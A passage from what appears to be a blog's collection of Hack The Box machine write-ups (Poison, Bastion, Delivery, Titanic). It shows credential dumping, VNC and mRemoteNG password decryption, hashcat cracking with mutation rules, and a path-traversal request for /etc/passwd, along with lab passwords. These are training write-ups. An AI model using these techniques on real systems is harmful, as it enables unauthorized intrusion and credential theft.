<number> intro In other words, to get the intro to general commands, type man 1 intro charix@Poison:~ % cat user.txt eaac.....209c So we have: charix : Charix!2#4%6&8(0\nPrivilege Escalation secret.zip We discover an encrypted secret.zip file at the root of charix's home. We can decrypt it with the same password as charix's SSH login: Charix!2#4%6&8(0\nWe discover a file of 8 encrypted characters\nVNC launched by root Looking at the processes run by root, we discover a VNC session open on port 5901, launched by root. 
If we manage to connect to it, we can potentially get a shell as root.\n╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes root 1 0.0 0.1 5408 1040 - SLs 22:56 0:00.00 /sbin/init -- root 319 0.0 0.5 9560 5052 - Ss 22:56 0:00.09 /sbin/devd root 390 0.0 0.2 10500 2452 - Ss 22:56 0:00.04 /usr/sbin/syslogd -s root 543 0.0 0.5 56320 5396 - S 22:57 0:01.18 /usr/local/bin/vmtoolsd -c /usr/local/share/vmware-tools/tools.conf -p /usr/local/lib/open-vm-tools/plugins/vmsvc root 620 0.0 0.7 57812 7052 - Is 22:57 0:00.01 /usr/sbin/sshd root 625 0.0 1.1 99172 11516 - Ss 22:58 0:00.06 /usr/local/sbin/httpd -DNOHTTPACCEPT root 642 0.0 0.6 20636 6140 - Ss 22:58 0:00.03 sendmail: accepting connections (sendmail) root 650 0.0 0.2 12592 2436 - Ss 22:59 0:00.01 /usr/sbin/cron -s root 529 0.0 0.9 23620 8872 v0- I 22:57 0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1 root 540 0.0 0.7 67220 7064 v0- I 22:57 0:00.01 xterm -geometry 80x24+10+10 -ls -title X Desktop root 541 0.0 0.5 37620 5312 v0- I 22:57 0:00.00 twm root 697 0.0 0.2 10484 2076 v0 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv0 root 698 0.0 0.2 10484 2076 v1 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv1 root 699 0.0 0.2 10484 2076 v2 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv2 root 700 0.0 0.2 10484 2076 v3 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv3 root 701 0.0 0.2 10484 2076 v4 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv4 root 702 0.0 0.2 10484 2076 v5 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv5 root 703 0.0 0.2 10484 2076 v6 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv6 root 704 0.0 0.2 10484 2076 v7 Is+ 22:59 0:00.00 /usr/libexec/getty Pc ttyv7 root 617 0.0 0.4 19660 3616 0 Is+ 22:57 0:00.00 -csh (csh) 
Decrypting the secret file Finally, we hypothesize that the secret file is an encrypted VNC password file. We try a GitHub tool to decrypt it: https://github.com/jeroennijhof/vncpwd\n┌──(kali㉿kali)-[~/htb/Poison] └─$ git clone https://github.com/jeroennijhof/vncpwd.git Cloning into 'vncpwd'... remote: Enumerating objects: 28, done. remote: Total 28 (delta 0), reused 0 (delta 0), pack-reused 28 (from 1) Receiving objects: 100% (28/28), 22.15 KiB | 1.85 MiB/s, done. Resolving deltas: 100% (9/9), done. ┌──(kali㉿kali)-[~/htb/Poison] └─$ cd vncpwd ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ ls d3des.c d3des.h LICENSE Makefile README vncpwd.c ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ make gcc -Wall -g -o vncpwd vncpwd.c d3des.c ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ ./vncpwd ../secret Password: VNCP@$$! We get the password: VNCP@$$!\nConnecting to the VNC session - root flag We can easily connect to a VNC session using the vncviewer tool. But port 5901 is only reachable locally on the machine! I solve this problem by port forwarding to my machine, using ssh's -L option.\nThen I was able to use vncviewer and open the session with the password obtained\n┌──(kali㉿kali)-[~/htb/Poison] └─$ ssh charix@10.10.10.84 -L 5901:localhost:5901 Charix!2#4%6&8(0 (charix@10.10.10.84) Password for charix@Poison: Last login: Tue Mar 4 23:11:10 2025 from 10.10.14.19 FreeBSD 11.1-RELEASE (GENERIC) #0 r321309: Fri Jul 21 02:08:28 UTC 2017 Welcome to FreeBSD! 
--------------------------------------------- ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ nmap localhost -p 5901 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-04 17:35 EST Nmap scan report for localhost (127.0.0.1) Host is up (0.000067s latency). Other addresses for localhost (not scanned): ::1 PORT STATE SERVICE 5901/tcp open vnc-1 Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ vncviewer localhost vncviewer: ConnectToTcpAddr: connect: Connection refused Unable to connect to VNC server ┌──(kali㉿kali)-[~/htb/Poison/vncpwd] └─$ vncviewer localhost:5901 Connected to RFB server, using protocol version 3.8 Enabling TightVNC protocol extensions Performing standard VNC authentication Password: Authentication successful Desktop name \"root's X desktop (Poison:1)\" VNC server default format: 32 bits per pixel. Least significant byte first in each pixel. True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Using default colormap which is TrueColor. Pixel format: 32 bits per pixel. Least significant byte first in each pixel. 
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0 Same machine: preferring raw encoding --------- VNCVIEWER ------------- root@Poison:~ # whoami root root@Poison:~ # cat root.txt 716d.....61f5 ","date":"2025-03-04T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/poison-htb/","title":"HTB | Poison"},{"content":" Machine name OS IP Difficulty Bastion Windows 10.10.10.134 Easy Users L4mpje : bureaulampje Administrator : thXLHM96BeKL0ER2 Peter : 3RTTT5zNt2 Enumeration nmap ┌──(kali㉿kali)-[~] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.134 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3bG3TRRwV6dlU1lPbviOW+3fBC7wab+KSQ0Gyhvf9Z1OxFh9v5e6GP4rt5Ss76ic1oAJPIDvQwGlKdeUEnjtEtQXB/78Ptw6IPPPPwF5dI1W4GvoGR4MV5Q6CPpJ6HLIJdvAcn3isTCZgoJT69xRK0ymPnqUqaB+/ptC4xvHmW9ptHdYjDOFLlwxg17e7Sy0CA67PW/nXu7+OKaIOx0lLn8QPEcyrYVCWAqVcUsgNNAjR4h1G7tYLVg3SGrbSmIcxlhSMexIFIVfR37LFlNIYc6Pa58lj2MSQLusIzRoQxaXO4YSp/dM1tk7CN2cKx1PTd9VVSDH+/Nq0HCXPiYh3 | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBF1Mau7cS9INLBOXVd4TXFX/02+0gYbMoFzIayeYeEOAcFQrAXa1nxhHjhfpHXWEj2u0Z/hfPBzOLBGi/ngFRUg= | 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB34X2ZgGpYNXYb+KLFENmf0P0iQ22Q0sjws2ATjFsiN 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds 5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found 
|_http-server-header: Microsoft-HTTPAPI/2.0 47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC Host script results: | smb2-time: | date: 2025-02-27T22:08:39 |_ start_date: 2025-02-27T22:04:13 | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\\x00 | Workgroup: WORKGROUP\\x00 |_ System time: 2025-02-27T23:08:38+01:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) |_clock-skew: mean: -19m59s, deviation: 34m38s, median: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 26941/tcp): CLEAN (Couldn't connect) | Check 2 (port 51775/tcp): CLEAN (Couldn't connect) | Check 3 (port 18741/udp): CLEAN (Failed to receive data) | Check 4 (port 15523/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked Foothold SMB \"backups\" share ┌──(kali㉿kali)-[~/htb/Bastion] └─$ smbclient --no-pass -L //10.10.10.134 Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin Backups Disk C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. 
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available Mount backup windows disk VHD guestmount -a ./9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd_mount Retrieve hashes from Windows files ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# cp /mnt/vhd_mount/Windows/System32/config/SAM . cp /mnt/vhd_mount/Windows/System32/config/SYSTEM . cp /mnt/vhd_mount/Windows/System32/config/SECURITY . ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# ls SAM SECURITY SYSTEM ┌──(root㉿kali)-[/home/kali/htb/Bastion] └─# impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9::: [*] Dumping cached domain logon information (domain/username:hash) [*] Dumping LSA Secrets [*] DefaultPassword (Unknown User):bureaulampje [*] DPAPI_SYSTEM dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6 dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd [*] Cleaning up... Hashcat bruteforce We have confirmation that the password is indeed: bureaulampje\nhashcat -m 1000 hash.txt ~/wordlists/rockyou.txt --show 26112010952d963c8dc4217daec986d9:bureaulampje SSH L4mpje ┌──(kali㉿kali)-[~] └─$ ssh L4mpje@10.10.10.134 Password: bureaulampje Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 
l4mpje@BASTION C:\\Users\\L4mpje>whoami bastion\\l4mpje l4mpje@BASTION C:\\Users\\L4mpje>type Desktop\\user.txt 1018.....3717 Recycle Bin - Peter username/pass PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> dir -ah Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a-hs- 22-2-2019 13:50 129 desktop.ini PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat .\\desktop.ini [.ShellClassInfo] CLSID={645FF040-5081-101B-9F08-00AA002F954E} LocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-8964 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> Get-ChildItem Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 22-2-2019 13:56 214 $I1MMX2E.txt -a---- 22-2-2019 13:56 218 $INTSJCP.bat -a---- 22-2-2019 13:54 67 $R1MMX2E.txt -a---- 22-2-2019 13:56 58 $RNTSJCP.bat PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> Get-ChildItem -Force Directory: C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002 Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 22-2-2019 13:56 214 $I1MMX2E.txt -a---- 22-2-2019 13:56 218 $INTSJCP.bat -a---- 22-2-2019 13:54 67 $R1MMX2E.txt -a---- 22-2-2019 13:56 58 $RNTSJCP.bat -a-hs- 22-2-2019 13:50 129 desktop.ini PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat '$RNTSJCP.bat' NET USE Z: \"\\\\192.168.1.74\\Backups\" /user:Peter 3RTTT5zNt2 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> date maandag 3 
maart 2025 00:05:57 PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat '$I1MMX2E.txt' (binary $I header, then the original path in UTF-16) C:\\Users\\L4mpje\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\L4mpje.bat.txt PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat '$INTSJCP.bat' (binary $I header, then the original path in UTF-16) C:\\Users\\L4mpje\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Peter-script.bat PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat '$R1MMX2E.txt' NET USE Z: \"\\\\192.168.1.74\\Backups\" /user:L4mpje /pass:bureaulampje PS C:\\$Recycle.Bin\\S-1-5-21-2146344083-2443430429-1430880910-1002> cat '$RNTSJCP.bat' NET USE Z: \"\\\\192.168.1.74\\Backups\" /user:Peter 3RTTT5zNt2 Privilege Escalation mRemoteNG Looking more closely at the installed software, we notice an interesting and suspicious program. It lets you connect to systems by authenticating with passwords stored in its configuration.\nRetrieving the configuration file Searching the internet, we find this information:\n%APPDATA%\\mRemoteNG\\confCons.xml According to one internet user, this file seems to contain the passwords. 
After checking, we find the Administrator's password hash as well as L4mpje's:\nPS C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG> ls Directory: C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 22-2-2019 14:01 Themes -a---- 22-2-2019 14:03 6316 confCons.xml -a---- 22-2-2019 14:02 6194 confCons.xml.20190222-1402277353.backup -a---- 22-2-2019 14:02 6206 confCons.xml.20190222-1402339071.backup -a---- 22-2-2019 14:02 6218 confCons.xml.20190222-1402379227.backup -a---- 22-2-2019 14:02 6231 confCons.xml.20190222-1403070644.backup -a---- 22-2-2019 14:03 6319 confCons.xml.20190222-1403100488.backup -a---- 22-2-2019 14:03 6318 confCons.xml.20190222-1403220026.backup -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403261268.backup -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403272831.backup -a---- 22-2-2019 14:03 6315 confCons.xml.20190222-1403433299.backup -a---- 22-2-2019 14:03 6316 confCons.xml.20190222-1403486580.backup -a---- 22-2-2019 14:03 51 extApps.xml -a---- 22-2-2019 14:03 5217 mRemoteNG.log -a---- 22-2-2019 14:03 2245 pnlLayout.xml PS C:\\Users\\L4mpje\\Appdata\\Roaming\\mRemoteNG> cat .\\confCons.xml <?xml version=\"1.0\" encoding=\"utf-8\"?> <mrng:Connections xmlns:mrng=\"http://mremoteng.org\" Name=\"Connections\" Export=\"false\" EncryptionEngine=\"AES\" BlockCipherMode=\"GCM\" KdfIterations=\"1000\" FullFileEncryption=\"false\" Protected=\"ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA\" ConfVersion=\"2.6\"> <Node Name=\"DC\" Type=\"Connection\" 
Descr=\"\" Icon=\"mRemoteNG\" Panel=\"General\" Id=\"500e7d58-662a-44d4-aff0-3a4f547a3fee\" Username=\"Administrator\" Domain=\"\" Password=\"aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==\" ... <Node Name=\"L4mpje-PC\" Type=\"Connection\" Descr=\"\" Icon=\"mRemoteNG\" Panel=\"General\" Id=\"8d3579b2-e68e-48c1-8f0f-9ee1347c9128\" Username=\"L4mpje\" Domain=\"\" Password=\"yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB\" ... So: Administrator : aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==\nDecrypting the Administrator's hash A tool is available on GitHub to crack this kind of file: https://github.com/haseebT/mRemoteNG-Decrypt\n┌──(kali㉿kali)-[~/htb/Bastion/mRemoteNG-Decrypt] └─$ python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw== Password: thXLHM96BeKL0ER2 SSH connection - root flag ┌──(kali㉿kali)-[~/htb/Bastion] └─$ ssh Administrator@10.10.10.134 Administrator@10.10.10.134's password: ** thXLHM96BeKL0ER2 ** Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. 
administrator@BASTION C:\\Users\\Administrator>type Desktop\\root.txt e90b.....42f6 ","date":"2025-03-03T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/bastion-htb/","title":"HTB | Bastion"},{"content":" Machine name: Delivery | OS: Linux | IP: 10.10.10.222 | Difficulty: Easy Enumeration nmap ┌──(kali㉿kali)-[~/htb/Delivery] └─$ nmap -sC -sV -An -p- -T4 -vvv 10.10.10.222 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCq549E025Q9FR27LDR6WZRQ52ikKjKUQLmE9ndEKjB0i1qOoL+WzkvqTdqEU6fFW6AqUIdSEd7GMNSMOk66otFgSoerK6MmH5IZjy4JqMoNVPDdWfmEiagBlG3H7IZ7yAO8gcg0RRrIQjE7XTMV09GmxEUtjojoLoqudUvbUi8COHCO6baVmyjZRlXRCQ6qTKIxRZbUAo0GOY8bYmf9sMLf70w6u/xbE2EYDFH+w60ES2K906x7lyfEPe73NfAIEhHNL8DBAUfQWzQjVjYNOLqGp/WdlKA1RLAOklpIdJQ9iehsH0q6nqjeTUv47mIHUiqaM+vlkCEAN3AAQH5mB/1 | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAiAKnk2lw0GxzzqMXNsPQ1bTk35WwxCa3ED5H34T1yYMiXnRlfssJwso60D34/IM8vYXH0rznR9tHvjdN7R3hY= | 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEV5D6eYjySqfhW4l4IF1SZkZHxIRihnY6Mn6D8mLEW7 80/tcp open http syn-ack ttl 63 nginx 1.14.2 |_http-server-header: nginx/1.14.2 | http-methods: |_ Supported Methods: GET HEAD |_http-title: Welcome 8065/tcp open unknown syn-ack ttl 63 | fingerprint-strings: | GenericLines, Help, RTSPRequest, SSLSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Accept-Ranges: bytes | Cache-Control: no-cache, max-age=31556926, public | Content-Length: 3108 | Content-Security-Policy: frame-ancestors 
'self'; script-src 'self' cdn.rudderlabs.com | Content-Type: text/html; charset=utf-8 | Last-Modified: Fri, 21 Feb 2025 11:56:08 GMT | X-Frame-Options: SAMEORIGIN | X-Request-Id: 518yfkngnbbmtm9xgi7thkpkdr | X-Version-Id: 5.30.0.5.30.1.57fb31b889bf81d99d8af8176d4bbaaa.false | Date: Fri, 21 Feb 2025 12:00:01 GMT | <!doctype html><html lang=\"en\"><head><meta charset=\"utf-8\"><meta name=\"viewport\" content=\"width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0\"><meta name=\"robots\" content=\"noindex, nofollow\"><meta name=\"referrer\" content=\"no-referrer\"><title>Mattermost</title><meta name=\"mobile-web-app-capable\" content=\"yes\"><meta name=\"application-name\" content=\"Mattermost\"><meta name=\"format-detection\" content=\"telephone=no\"><link re | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Date: Fri, 21 Feb 2025 12:00:02 GMT |_ Content-Length: 0 Foothold Mattermost / helpdesk.delivery.htb We can open tickets. When we open a ticket we are given a number and an e-mail address we can write to, for example: 1239870@delivery.htb\nThere is also a \"Mattermost\" server with a login page where we can create an account using that e-mail: 1239870@delivery.htb\nWe are asked for a confirmation. 
We receive that e-mail... directly in the status of the ticket created earlier!\n---- Registration Successful ---- Please activate your email by going to: http://delivery.htb:8065/do_verify_email?token=49opc49pbwfahgew54koaa699uawqjjxt3xpanuwpte3jgf6etkczaprg8487und&email=1568729%40delivery.htb Internal Channel We get access to the platform after clicking the confirmation link. We join the \"internal\" team, which gives access to an internal channel with messages!\nroot 9:29 AM @developers Please update theme to the OSTicket before we go live. Credentials to the server are maildeliverer:Youve_G0t_Mail! 9:30 AM Also please create a program to help us stop re-using the same passwords everywhere.... Especially those that are a variant of \"PleaseSubscribe!\" root 10:58 AM! PleaseSubscribe! may not be in RockYou but if any hacker manages to get our hashes, they can use hashcat rules to easily crack all variations of common words or phrases. maildeliverer:Youve_G0t_Mail!\nmaildeliverer account: user flag It is enough to log in over SSH with the \"maildeliverer\" credentials!\n┌──(kali㉿kali)-[~/htb/Delivery] └─$ ssh maildeliverer@delivery.htb maildeliverer@delivery.htb's password: Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. 
Last login: Sun Feb 23 17:28:33 2025 from 10.10.14.3 maildeliverer@Delivery:~$ ls user.txt maildeliverer@Delivery:~$ cat user.txt fe3d.....c5aa Privilege Escalation DB password We find a file containing credentials to connect to the MySQL database (port 3306):\nmaildeliverer@Delivery:/var/www/osticket$ cat upload/include/ost-config.php <?php /********************************************************************* ost-config.php ... ## Database Options ## --------------------------------------------------- ## Mysql Login info define('DBTYPE','mysql'); define('DBHOST','localhost'); define('DBNAME','osticket'); define('DBUSER','ost_user'); define('DBPASS','!H3lpD3sk123!'); MariaDB [osticket]> select username,firstname,lastname,passwd,email from ost_staff; +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ | username | firstname | lastname | passwd | email | +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ | maildeliverer | Delivery | Person | $2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy | maildeliverer@delivery.htb | +---------------+-----------+----------+--------------------------------------------------------------+----------------------------+ We confirm that it is the same password as for SSH:\n$2a$08$VlccTgoFaxEaGJnZtWwJBOf2EqMW5L1ZLA72QoQN/TrrOJt9mFGcy:Youve_G0t_Mail! 
Session..........: hashcat Status...........: Cracked The osticket MySQL database is therefore a dead end; this is not the hash we are interested in.\nMattermost config Looking around a bit, we find the Mattermost config file:\nmaildeliverer@Delivery:/opt/mattermost/config$ cat config.json | grep user \"TeammateNameDisplay\": \"username\", \"DataSource\": \"mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\\u0026readTimeout=30s\\u0026writeTimeout=30s\", So we have a new database, mattermost, and new credentials: mmuser:Crack_The_MM_Admin_PW\nRetrieving the hashes This time we find all the Mattermost password hashes, which is clearly more interesting at first sight:\nMariaDB [mattermost]> select Username,Password from Users; +----------------------------------+--------------------------------------------------------------+ | Username | Password | +----------------------------------+--------------------------------------------------------------+ | helloguys | $2a$10$nX8mrkBf3qoX5hnoxZKg..9SzAx.oVvfCGelMzzebV6Oa2HI8eq0K | | surveybot | | | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | | channelexport | | | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | | aaaaaa | $2a$10$J1d0c.sHFogqV5LoR72JXeFGTQAaAGRVmZJRX1WgyHq/VDiI55..W | +----------------------------------+--------------------------------------------------------------+ Hashcat best rules - creating password list We create a new wordlist based on the keyword 'PleaseSubscribe!' mentioned in the Mattermost channel, using hashcat's password mutation rules:\n$ echo -e 'PleaseSubscribe!' > base_words.txt $ hashcat --stdout base_words.txt -r /usr/share/hashcat/rules/best64.rule > mutated_wordlist.txt All that remains is to brute-force the hashes with the generated list:\n$ hashcat -m 3200 hash.txt ./mutated_wordlist.txt hashcat (v6.2.5) starting ... Dictionary cache hit: * Filename..: ./mutated_wordlist.txt * Passwords.: 77 * Bytes.....: 1177 * Keyspace..: 77 The wordlist or mask that you are using is too small. This means that hashcat cannot use the full parallel power of your device(s). Unless you supply more work, your cracking speed will drop. For tips on supplying more work, see: https://hashcat.net/faq/morework Approaching final keyspace - workload adjusted. $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO:PleaseSubscribe!21 root flag All that remains is to log in with the password:\nmaildeliverer@Delivery:~$ su - root Password: root@Delivery:~# cat /root/root.txt eb84.....c688 ","date":"2025-02-24T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/delivery-htb/","title":"HTB | Delivery"},{"content":" Machine name: Titanic | OS: Linux | IP: 10.10.11.55 | Difficulty: Easy Users developer : `25282528` Enumeration nmap ┌──(kali㉿kali)-[~/htb/Titanic] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.55 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 73:03:9c:76:eb:04:f1:fe:c9:e9:80:44:9c:7f:13:46 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGZG4yHYcDPrtn7U0l+ertBhGBgjIeH9vWnZcmqH0cvmCNvdcDY/ItR3tdB4yMJp0ZTth5itUVtlJJGHRYAZ8Wg= | 256 
d5:bd:1d:5e:9a:86:1c:eb:88:63:4d:5f:88:4b:7e:04 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDT1btWpkcbHWpNEEqICTtbAcQQitzOiPOmc3ZE0A69Z 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.52 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: Did not follow redirect to http://titanic.htb/ |_http-server-header: Apache/2.4.52 (Ubuntu) Foothold Website titanic.htb : LFI There is a form we can fill in to book our trip. At the end, it makes us download a .json file containing our ticket. However, by manipulating this ticket= parameter we can retrieve the contents of any file\nGET /download?ticket=../../../../../../../../etc/passwd HTTP/1.1 Host: titanic.htb User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, 